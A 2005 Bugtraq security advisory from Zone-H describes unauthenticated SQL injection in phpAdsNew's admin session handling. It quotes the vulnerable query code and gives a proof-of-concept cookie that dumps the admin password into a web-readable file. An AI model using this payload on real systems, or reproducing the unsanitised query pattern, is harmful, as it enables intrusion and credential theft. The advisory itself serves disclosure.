ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities

From: Siegfried (siegfri3d_at_gmail.com)
Date: 11/11/05

  • Next message: Thierry Carrez: "[ GLSA 200511-08 ] PHP: Multiple vulnerabilities"
    Date: Fri, 11 Nov 2005 07:45:44 +0100
    To: bugtraq@securityfocus.com
    
    

    ZRCSA-200502 - phpAdsNew SQL Injection Vulnerabilities

    Zone-H Research Center Security Advisory 200502
    http://www.zone-h.fr

    Date of release: 11/11/2005
    Software: phpAdsNew (www.phpadsnew.com)
    Affected versions:
    <= 2.0.6
    2.0.7rc1 (latest CVS snapshot)
    Risk: Medium
    Discovered by: Kevin Fernandez "Siegfried" from the Zone-H Research Team

    Background (from their web site)
    ----------
    phpAdsNew is an open-source ad server, with an integrated banner
    management interface and tracking system for gathering statistics.
    With phpAdsNew you can easily rotate paid banners and your own
    in-house advertisements. You can even integrate banners from third
    party advertising companies.

    Details
    --------
    Toni Koivunen has published an advisory yesterday regarding a
    vulnerability exploitable via /admin/logout.php, that can be used to
    delete arbitrary data (maybe more). However more sql injections are
    present in this part of the code, all the functions in
    /admin/lib-sessions.inc.php do not check the "sessionID" variable
    coming from the cookie, the most interesting is
    phpAds_SessionDataFetch() because it is called in config.php and makes
    a simple SELECT query.

    Snip:
    [no previous check]
           if (isset($HTTP_COOKIE_VARS['sessionID']) &&
    $HTTP_COOKIE_VARS['sessionID'] != '')
            {
    $result = phpAds_dbQuery("SELECT sessiondata FROM
    ".$phpAds_config['tbl_session']." WHERE
    sessionid='".$HTTP_COOKIE_VARS['sessionID']."'" .
    " AND UNIX_TIMESTAMP(NOW())-UNIX_TIMESTAMP(lastused) < 3600"); <-- ouch

    Since /admin/config.php is included in /admin/index.php, we don't need
    to be authenticated to exploit the vulnerability.

    PoC (cookie):
    sessionID=adsds'/**/UNION/**/SELECT admin_pw from phpads_config into
    outfile "/var/www/blah.txt"/*;

    Just "exploit" one of the many errors in the pages to get the path and
    here you go, open /admin/index.php with that as cookie.

    Solution
    ---------
    No patch.

    Filter the variable in the affected functions.

    Original advisories:
    English version: http://www.zone-h.org/en/advisories/read/id=8413/
    French: http://www.zone-h.fr/fr/advisories/read/id=674/


  • Next message: Thierry Carrez: "[ GLSA 200511-08 ] PHP: Multiple vulnerabilities"

    Relevant Pages

    • [Full-disclosure] ZRCAS-200502 - phpAdsNew SQL Injection Vulnerabilities
      ... Zone-H Research Center Security Advisory 200502 ... Software: phpAdsNew ... Kevin Fernandez "Siegfried" from the Zone-H Research Team ... open /admin/index.php with that as cookie. ...
      (Full-Disclosure)
    • [NT] CitectSCADA ODBC Service Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Get your security news from a reliable source. ... are distributed in over 80 countries through a network of more than 500 ... A vulnerability was found in CitectSCADA that could allow a remote ...
      (Securiteam)
    • Re: [Full-disclosure] Full-Disclosure Digest, Vol 79, Issue 21
      ... See MS advisory for full list of affected products. ... Seeker Research Center Security Advisory ... This vulnerability was discovered by Seeker? ... The request also contains other parameters required by the page, the vulnerable parameter being the parameter noted above. ...
      (Full-Disclosure)
    • [NT] Microsoft Word Malformed FIB Arbitrary Free Vulnerability (MS08-072)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability has been found in the way that Microsoft Word handles ... Vendor Information, Solutions and Workarounds: ... Core requests information concerning Microsoft's plans to fix ...
      (Securiteam)
    • [Full-disclosure] CORE-2014-0002 - Oracle VirtualBox 3D Acceleration Multiple Memory
      ... Core Security - Corelabs Advisory ... Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities ... *Vulnerability Information* ...
      (Full-Disclosure)